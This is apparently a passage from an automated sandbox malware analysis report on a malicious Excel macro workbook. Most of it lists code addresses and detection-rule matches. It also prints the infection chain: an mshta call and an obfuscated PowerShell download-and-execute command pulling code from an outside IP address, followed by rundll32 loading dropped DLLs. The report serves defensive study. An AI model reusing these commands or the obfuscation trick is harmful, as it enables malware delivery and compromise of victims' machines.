Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00213E3F 12_2_00213E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00220001 12_2_00220001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00228606 12_2_00228606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00230C14 12_2_00230C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00214816 12_2_00214816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00215E60 12_2_00215E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022A666 12_2_0022A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022AE6D 12_2_0022AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022907F 12_2_0022907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00226C49 12_2_00226C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00212051 12_2_00212051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00212251 12_2_00212251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00220E53 12_2_00220E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00230056 12_2_00230056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00211A56 12_2_00211A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00214C5D 12_2_00214C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002170B3 12_2_002170B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021EE81 12_2_0021EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00221889 12_2_00221889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021EA99 12_2_0021EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021F09B 12_2_0021F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00214EE3 12_2_00214EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002164E2 12_2_002164E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022A2E8 12_2_0022A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00229EEC 12_2_00229EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022DCF7 12_2_0022DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021AEFB 12_2_0021AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021B2C7 12_2_0021B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00225CC4 12_2_00225CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002266CA 12_2_002266CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E2CC 12_2_0021E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022DEDC 12_2_0022DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022BB23 12_2_0022BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00216D24 12_2_00216D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00230F33 12_2_00230F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00217735 12_2_00217735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00218B3D 12_2_00218B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00219714 12_2_00219714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00228519 12_2_00228519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00220B19 12_2_00220B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00215361 12_2_00215361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00218969 12_2_00218969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022176B 12_2_0022176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021BB7E 12_2_0021BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021CF47 12_2_0021CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00214346 12_2_00214346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00215548 12_2_00215548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022894B 12_2_0022894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021B74D 12_2_0021B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00222550 12_2_00222550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022CB5B 12_2_0022CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021A55F 12_2_0021A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022C3A0 12_2_0022C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00227BA6 12_2_00227BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002309B5 12_2_002309B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002181B7 12_2_002181B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002151BB 12_2_002151BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00219B83 12_2_00219B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00224B87 12_2_00224B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022D389 12_2_0022D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E991 12_2_0021E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022E395 12_2_0022E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00228BE3 12_2_00228BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0022DBEA 12_2_0022DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021DFF3 12_2_0021DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00226DF8 12_2_00226DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00229BCF 12_2_00229BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00219DCF 12_2_00219DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E5CF 12_2_0021E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00227DD5 12_2_00227DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00212BD9 12_2_00212BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030F8FD 15_2_0030F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030E991 15_2_0030E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030AB87 15_2_0030AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031C631 15_2_0031C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031AA30 15_2_0031AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031F435 15_2_0031F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00307C37 15_2_00307C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00320E3A 15_2_00320E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031AC3A 15_2_0031AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00303C3C 15_2_00303C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00303E3F 15_2_00303E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031BE27 15_2_0031BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00309011 15_2_00309011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00304816 15_2_00304816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00320C14 15_2_00320C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00310001 15_2_00310001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00318606 15_2_00318606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031907F 15_2_0031907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00305E60 15_2_00305E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031A666 15_2_0031A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031AE6D 15_2_0031AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00302051 15_2_00302051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00302251 15_2_00302251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00310E53 15_2_00310E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00320056 15_2_00320056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00301A56 15_2_00301A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00304C5D 15_2_00304C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00316C49 15_2_00316C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031044F 15_2_0031044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003070B3 15_2_003070B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003120BA 15_2_003120BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030EA99 15_2_0030EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030F09B 15_2_0030F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030EE81 15_2_0030EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00311889 15_2_00311889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031DCF7 15_2_0031DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030AEFB 15_2_0030AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003064E2 15_2_003064E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00304EE3 15_2_00304EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031A2E8 15_2_0031A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00319EEC 15_2_00319EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030D6D8 15_2_0030D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031DEDC 15_2_0031DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00315CC4 15_2_00315CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030B2C7 15_2_0030B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003166CA 15_2_003166CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030E2CC 15_2_0030E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00320F33 15_2_00320F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00307735 15_2_00307735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031473C 15_2_0031473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00308B3D 15_2_00308B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031BB23 15_2_0031BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00306D24 15_2_00306D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00309714 15_2_00309714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00314116 15_2_00314116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00318519 15_2_00318519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00310B19 15_2_00310B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030BB7E 15_2_0030BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00305361 15_2_00305361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00308969 15_2_00308969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031176B 15_2_0031176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00312550 15_2_00312550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031CB5B 15_2_0031CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030A55F 15_2_0030A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00304346 15_2_00304346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030CF47 15_2_0030CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00305548 15_2_00305548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031894B 15_2_0031894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030B74D 15_2_0030B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003209B5 15_2_003209B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003081B7 15_2_003081B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003051BB 15_2_003051BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031C3A0 15_2_0031C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00317BA6 15_2_00317BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003213AD 15_2_003213AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031E395 15_2_0031E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00309B83 15_2_00309B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00314B87 15_2_00314B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031D389 15_2_0031D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00307FF2 15_2_00307FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003059F2 15_2_003059F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030DFF3 15_2_0030DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00316DF8 15_2_00316DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003195FA 15_2_003195FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00318BE3 15_2_00318BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031DBEA 15_2_0031DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00317DD5 15_2_00317DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00302BD9 15_2_00302BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00319BCF 15_2_00319BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00309DCF 15_2_00309DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0030E5CF 15_2_0030E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C0001 16_2_002C0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B9011 16_2_002B9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002CAE6D 16_2_002CAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002CA666 16_2_002CA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C907F 16_2_002C907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C044F 16_2_002C044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C20BA 16_2_002C20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002BEE81 16_2_002BEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002CA2E8 16_2_002CA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B64E2 16_2_002B64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002BF8FD 16_2_002BF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002BE2CC 16_2_002BE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B6D24 16_2_002B6D24
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: NZW-010122 BNUV-280122.xlsm Macro extractor: Sheet name: LINKO
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E249 DeleteService, 12_2_0021E249
Source: NZW-010122 BNUV-280122.xlsm, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Svccveo\
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: NZW-010122 BNUV-280122.xlsm OLE indicator, VBA macros: true
Source: NZW-010122 BNUV-280122.xls.0.dr OLE indicator, VBA macros: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$NZW-010122 BNUV-280122.xlsm
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@21/12@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: NZW-010122 BNUV-280122.xlsm OLE indicator, Workbook stream: true
Source: NZW-010122 BNUV-280122.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P...............................P.......................`I.........v.....................K........Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.w....................?E9k....................................}..v............0................."............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................?E9k..... ..............................}..v....`.......0.................Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.w.....................D9k....................................}..v............0................."............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................D9k....x.Z.............................}..v....0.......0.................Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.w....#.............../D9k....................................}..v....H.......0................."............................. 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.............../D9k....(.Z.............................}..v............0.................Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'..............._l9k....E...............................}..v............0...............x.Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+..............._l9k....E...............................}..v............0...............x.Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............(.......:.......................
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE2EE.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B5988 CreateToolhelp32Snapshot, 16_2_002B5988
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB4 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb: source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdbm source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F08CC push 8B4902E0h; iretd 4_3_032F08D1
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F00C2 push 8B4902E0h; iretd 4_3_032F00C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x8ba6a

Persistence and Installation Behavior

